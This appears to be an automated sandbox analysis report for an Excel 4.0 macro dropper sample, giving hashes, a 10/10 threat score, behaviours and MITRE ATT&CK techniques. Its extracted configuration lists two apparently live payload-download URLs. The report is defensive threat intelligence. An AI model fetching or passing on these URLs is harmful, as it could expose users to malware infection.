General

  • Target

    31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

  • Size

    36KB

  • Sample

    230129-x28cqacb5y

  • MD5

    be42208b9b4852b7787910c984672e48

  • SHA1

    8a842fcafbb7c35c9d390064d9031f8481aa8b4f

  • SHA256

    31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

  • SHA512

    49d12fe027dec967c6f608fe5e8bbf9c5f990634270fc87fe5e39ba043f4ad1b654f6d6d136e1b031041d433643661b891c9ee4b37ed9449f88238649ba633d4

  • SSDEEP

    768:cPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ0o6y2J6tXJzT:Iok3hbdlylKsgqopeJBWhZFGkE+cL2Ny

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://statedauto.com/wp-data.php

xlm40.dropper

https://markens.online/wp-data.php

Targets

    • Target

      31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

    • Size

      36KB

    • MD5

      be42208b9b4852b7787910c984672e48

    • SHA1

      8a842fcafbb7c35c9d390064d9031f8481aa8b4f

    • SHA256

      31b4be1cc02d1b5a2c9de1ccac2fb4063d7d9cc3692bd1449f7d4477a3ced147

    • SHA512

      49d12fe027dec967c6f608fe5e8bbf9c5f990634270fc87fe5e39ba043f4ad1b654f6d6d136e1b031041d433643661b891c9ee4b37ed9449f88238649ba633d4

    • SSDEEP

      768:cPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ0o6y2J6tXJzT:Iok3hbdlylKsgqopeJBWhZFGkE+cL2Ny

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Drops file in System32 directory

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks